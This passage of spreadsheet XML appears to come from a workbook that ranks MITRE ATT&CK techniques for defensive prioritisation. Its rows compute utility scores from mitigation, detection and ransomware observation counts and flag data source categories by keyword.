        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT205" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU20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0.78439153439153442</v>
      </c>
    </row>
    <row r="206" spans="1:47" ht="34">
      <c r="A206" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B206" s="37">
        <f t="shared" si="3"/>
        <v>84.75238095238096</v>
      </c>
      <c r="C206" s="37" t="s">
        <v>730</v>
      </c>
      <c r="D206" s="50" t="s">
        <v>731</v>
      </c>
      <c r="E206" s="37"/>
      <c r="F206" s="37">
        <v>1</v>
      </c>
      <c r="G206" s="37">
        <v>1</v>
      </c>
      <c r="H206" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I206" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J206" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K206" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L206" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M206" s="37">
        <v>0</v>
      </c>
      <c r="N206" s="56">
        <v>0</v>
      </c>
      <c r="O206" s="56">
        <v>1</v>
      </c>
      <c r="P206" s="56">
        <v>0</v>
      </c>
      <c r="Q206" s="56">
        <v>0</v>
      </c>
      <c r="R206" s="57"/>
      <c r="S206" s="57">
        <v>0</v>
      </c>
      <c r="T206" s="57"/>
      <c r="U206" s="57">
        <v>0</v>
      </c>
      <c r="V206" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>4.7619047619047615E-3</v>
      </c>
      <c r="W206" s="37">
        <v>0</v>
      </c>
      <c r="X206" s="37">
        <v>0</v>
      </c>
      <c r="Y206" s="37">
        <v>0</v>
      </c>
      <c r="Z206" s="37">
        <v>1</v>
      </c>
      <c r="AA206" s="37">
        <v>0.01</v>
      </c>
      <c r="AB206" s="37">
        <v>0.01</v>
      </c>
      <c r="AC206" s="37"/>
      <c r="AD206" s="50" t="s">
        <v>469</v>
      </c>
      <c r="AE206" s="37" t="str" cm="1">
        <f t="array" ref="AE206">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD206)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF206" s="37">
        <v>202</v>
      </c>
      <c r="AG206" s="37" t="str" cm="1">
        <f t="array" ref="AG206">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD206)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH206" s="37">
        <v>202</v>
      </c>
      <c r="AI206" s="37" t="str" cm="1">
        <f t="array" ref="AI206">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD206)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ206" s="37">
        <v>202</v>
      </c>
      <c r="AK206" s="37" t="str" cm="1">
        <f t="array" ref="AK206">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD206)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL206" s="37">
        <v>202</v>
      </c>
      <c r="AM206" s="37" t="str" cm="1">
        <f t="array" ref="AM206">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD206)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN206" s="37">
        <v>0</v>
      </c>
      <c r="AO206" s="37">
        <v>0</v>
      </c>
      <c r="AP206" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ206" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>28.250793650793653</v>
      </c>
      <c r="AR206" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS206" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT206" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU20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07" spans="1:47" ht="34">
      <c r="A207" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="B207" s="37">
        <f t="shared" si="3"/>
        <v>366.24240800000001</v>
      </c>
      <c r="C207" s="37" t="s">
        <v>732</v>
      </c>
      <c r="D207" s="50" t="s">
        <v>733</v>
      </c>
      <c r="E207" s="37"/>
      <c r="F207" s="37">
        <v>1</v>
      </c>
      <c r="G207" s="37">
        <v>1</v>
      </c>
      <c r="H207" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I207" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J207" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K207" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L207" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M207" s="37">
        <v>3.6197E-2</v>
      </c>
      <c r="N207" s="56">
        <v>0</v>
      </c>
      <c r="O207" s="56">
        <v>17</v>
      </c>
      <c r="P207" s="56">
        <v>8</v>
      </c>
      <c r="Q207" s="56">
        <v>9</v>
      </c>
      <c r="R207" s="57" t="s">
        <v>734</v>
      </c>
      <c r="S207" s="57">
        <v>8</v>
      </c>
      <c r="T207" s="57" t="s">
        <v>735</v>
      </c>
      <c r="U207" s="57">
        <v>8</v>
      </c>
      <c r="V207" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.31428566666666669</v>
      </c>
      <c r="W207" s="37">
        <v>16</v>
      </c>
      <c r="X207" s="37">
        <v>0.29090899999999997</v>
      </c>
      <c r="Y207" s="37">
        <v>0.29090899999999997</v>
      </c>
      <c r="Z207" s="37">
        <v>34</v>
      </c>
      <c r="AA207" s="37">
        <v>0.34</v>
      </c>
      <c r="AB207" s="37">
        <v>0.34</v>
      </c>
      <c r="AC207" s="37"/>
      <c r="AD207" s="50" t="s">
        <v>159</v>
      </c>
      <c r="AE207" s="37" t="str" cm="1">
        <f t="array" ref="AE207">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD207)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF207" s="37">
        <v>203</v>
      </c>
      <c r="AG207" s="37" t="str" cm="1">
        <f t="array" ref="AG207">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD207)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH207" s="37">
        <v>203</v>
      </c>
      <c r="AI207" s="37" t="str" cm="1">
        <f t="array" ref="AI207">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD207)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ207" s="37">
        <v>203</v>
      </c>
      <c r="AK207" s="37" t="str" cm="1">
        <f t="array" ref="AK207">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD207)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL207" s="37">
        <v>203</v>
      </c>
      <c r="AM207" s="37" t="str" cm="1">
        <f t="array" ref="AM207">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD207)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN207" s="37">
        <v>0</v>
      </c>
      <c r="AO207" s="37">
        <v>1</v>
      </c>
      <c r="AP207" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="AQ207" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>122.08080266666667</v>
      </c>
      <c r="AR207" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS207" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT207" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU20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2.9304953015873014</v>
      </c>
    </row>
    <row r="208" spans="1:47" ht="34">
      <c r="A208" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="B208" s="37">
        <f t="shared" si="3"/>
        <v>217.86674447619049</v>
      </c>
      <c r="C208" s="37" t="s">
        <v>736</v>
      </c>
      <c r="D208" s="50" t="s">
        <v>733</v>
      </c>
      <c r="E208" s="37" t="s">
        <v>737</v>
      </c>
      <c r="F208" s="37">
        <v>1</v>
      </c>
      <c r="G208" s="37">
        <v>1</v>
      </c>
      <c r="H208" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I208" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J208" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K208" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L208" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M208" s="37">
        <v>0</v>
      </c>
      <c r="N208" s="56">
        <v>1</v>
      </c>
      <c r="O208" s="56">
        <v>1</v>
      </c>
      <c r="P208" s="56">
        <v>3</v>
      </c>
      <c r="Q208" s="56">
        <v>6</v>
      </c>
      <c r="R208" s="57" t="s">
        <v>738</v>
      </c>
      <c r="S208" s="57">
        <v>7</v>
      </c>
      <c r="T208" s="57" t="s">
        <v>739</v>
      </c>
      <c r="U208" s="57">
        <v>5</v>
      </c>
      <c r="V208" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.1666667619047619</v>
      </c>
      <c r="W208" s="37">
        <v>12</v>
      </c>
      <c r="X208" s="37">
        <v>0.21818199999999999</v>
      </c>
      <c r="Y208" s="37">
        <v>0.21818199999999999</v>
      </c>
      <c r="Z208" s="37">
        <v>11</v>
      </c>
      <c r="AA208" s="37">
        <v>0.11</v>
      </c>
      <c r="AB208" s="37">
        <v>0.11</v>
      </c>
      <c r="AC208" s="37"/>
      <c r="AD208" s="50" t="s">
        <v>159</v>
      </c>
      <c r="AE208" s="37" t="str" cm="1">
        <f t="array" ref="AE208">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD208)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF208" s="37">
        <v>204</v>
      </c>
      <c r="AG208" s="37" t="str" cm="1">
        <f t="array" ref="AG208">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD208)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH208" s="37">
        <v>204</v>
      </c>
      <c r="AI208" s="37" t="str" cm="1">
        <f t="array" ref="AI208">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD208)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ208" s="37">
        <v>204</v>
      </c>
      <c r="AK208" s="37" t="str" cm="1">
        <f t="array" ref="AK208">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD208)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL208" s="37">
        <v>204</v>
      </c>
      <c r="AM208" s="37" t="str" cm="1">
        <f t="array" ref="AM208">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD208)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN208" s="37">
        <v>0</v>
      </c>
      <c r="AO208" s="37">
        <v>1</v>
      </c>
      <c r="AP208" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="AQ208" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>72.622248158730159</v>
      </c>
      <c r="AR208" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS208" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT208" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU20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1.7529106704459563</v>
      </c>
    </row>
    <row r="209" spans="1:47" ht="17">
      <c r="A209" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.36666666666666664</v>
      </c>
      <c r="B209" s="37">
        <f t="shared" si="3"/>
        <v>140.98599042857143</v>
      </c>
      <c r="C209" s="37" t="s">
        <v>740</v>
      </c>
      <c r="D209" s="50" t="s">
        <v>741</v>
      </c>
      <c r="E209" s="37"/>
      <c r="F209" s="37">
        <v>1</v>
      </c>
      <c r="G209" s="37">
        <v>1</v>
      </c>
      <c r="H209" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I209" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J209" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K209" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L209" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M209" s="37">
        <v>2.9599999999999998E-4</v>
      </c>
      <c r="N209" s="56">
        <v>0</v>
      </c>
      <c r="O209" s="56">
        <v>0</v>
      </c>
      <c r="P209" s="56">
        <v>1</v>
      </c>
      <c r="Q209" s="56">
        <v>0</v>
      </c>
      <c r="R209" s="57" t="s">
        <v>742</v>
      </c>
      <c r="S209" s="57">
        <v>2</v>
      </c>
      <c r="T209" s="57" t="s">
        <v>743</v>
      </c>
      <c r="U209" s="57">
        <v>5</v>
      </c>
      <c r="V209" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>7.142871428571429E-2</v>
      </c>
      <c r="W209" s="37">
        <v>7</v>
      </c>
      <c r="X209" s="37">
        <v>0.127273</v>
      </c>
      <c r="Y209" s="37">
        <v>0.127273</v>
      </c>
      <c r="Z209" s="37">
        <v>1</v>
      </c>
      <c r="AA209" s="37">
        <v>0.01</v>
      </c>
      <c r="AB209" s="37">
        <v>0.01</v>
      </c>
      <c r="AC209" s="37"/>
      <c r="AD209" s="50" t="s">
        <v>404</v>
      </c>
      <c r="AE209" s="37" t="str" cm="1">
        <f t="array" ref="AE209">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD209)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF209" s="37">
        <v>205</v>
      </c>
      <c r="AG209" s="37" t="str" cm="1">
        <f t="array" ref="AG209">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD209)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH209" s="37">
        <v>205</v>
      </c>
      <c r="AI209" s="37" t="str" cm="1">
        <f t="array" ref="AI209">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD209)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ209" s="37">
        <v>205</v>
      </c>
      <c r="AK209" s="37" t="str" cm="1">
        <f t="array" ref="AK209">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD209)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL209" s="37">
        <v>205</v>
      </c>
      <c r="AM209" s="37" t="str" cm="1">
        <f t="array" ref="AM209">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD209)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN209" s="37">
        <v>0</v>
      </c>
      <c r="AO209" s="37">
        <v>2</v>
      </c>
      <c r="AP209" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.36666666666666664</v>
      </c>
      <c r="AQ209" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>46.995330142857142</v>
      </c>
      <c r="AR209" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS209" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AT209" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AU20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2.2854919115646255</v>
      </c>
    </row>
    <row r="210" spans="1:47" ht="17">
      <c r="A210" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.43333333333333335</v>
      </c>
      <c r="B210" s="37">
        <f t="shared" si="3"/>
        <v>214.92825357142857</v>
      </c>
      <c r="C210" s="37" t="s">
        <v>744</v>
      </c>
      <c r="D210" s="50" t="s">
        <v>745</v>
      </c>
      <c r="E210" s="37"/>
      <c r="F210" s="37">
        <v>2</v>
      </c>
      <c r="G210" s="37">
        <v>1</v>
      </c>
      <c r="H210" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.15000000000000002</v>
      </c>
      <c r="I210" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.2</v>
      </c>
      <c r="J210" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.2</v>
      </c>
      <c r="K210" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L210" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M210" s="37">
        <v>2.4805000000000001E-2</v>
      </c>
      <c r="N210" s="56">
        <v>0</v>
      </c>
      <c r="O210" s="56">
        <v>0</v>
      </c>
      <c r="P210" s="56">
        <v>0</v>
      </c>
      <c r="Q210" s="56">
        <v>0</v>
      </c>
      <c r="R210" s="57" t="s">
        <v>134</v>
      </c>
      <c r="S210" s="57">
        <v>2</v>
      </c>
      <c r="T210" s="57" t="s">
        <v>74</v>
      </c>
      <c r="U210" s="57">
        <v>7</v>
      </c>
      <c r="V210" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>8.5714095238095242E-2</v>
      </c>
      <c r="W210" s="37">
        <v>9</v>
      </c>
      <c r="X210" s="37">
        <v>0.163636</v>
      </c>
      <c r="Y210" s="37">
        <v>0.163636</v>
      </c>
      <c r="Z210" s="37">
        <v>0</v>
      </c>
      <c r="AA210" s="37">
        <v>0</v>
      </c>
      <c r="AB210" s="37">
        <v>0</v>
      </c>
      <c r="AC210" s="37"/>
      <c r="AD210" s="50" t="s">
        <v>75</v>
      </c>
      <c r="AE210" s="37" t="str" cm="1">
        <f t="array" ref="AE210">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD210)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF210" s="37">
        <v>206</v>
      </c>
      <c r="AG210" s="37" t="str" cm="1">
        <f t="array" ref="AG210">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD210)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH210" s="37">
        <v>206</v>
      </c>
      <c r="AI210" s="37" t="str" cm="1">
        <f t="array" ref="AI210">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD210)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ210" s="37">
        <v>206</v>
      </c>
      <c r="AK210" s="37" t="str" cm="1">
        <f t="array" ref="AK210">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD210)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL210" s="37">
        <v>206</v>
      </c>
      <c r="AM210" s="37" t="str" cm="1">
        <f t="array" ref="AM210">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD210)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN210" s="37">
        <v>0</v>
      </c>
      <c r="AO210" s="37">
        <v>4</v>
      </c>
      <c r="AP210" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.43333333333333335</v>
      </c>
      <c r="AQ210" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>71.64275119047619</v>
      </c>
      <c r="AR210" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS210" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0.19047619047619047</v>
      </c>
      <c r="AT210" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0.19047619047619047</v>
      </c>
      <c r="AU21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6.9183572562358266</v>
      </c>
    </row>
    <row r="211" spans="1:47" ht="17">
      <c r="A211" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="B211" s="37">
        <f t="shared" si="3"/>
        <v>157.90460400000001</v>
      </c>
      <c r="C211" s="37" t="s">
        <v>746</v>
      </c>
      <c r="D211" s="50" t="s">
        <v>745</v>
      </c>
      <c r="E211" s="37" t="s">
        <v>747</v>
      </c>
      <c r="F211" s="37">
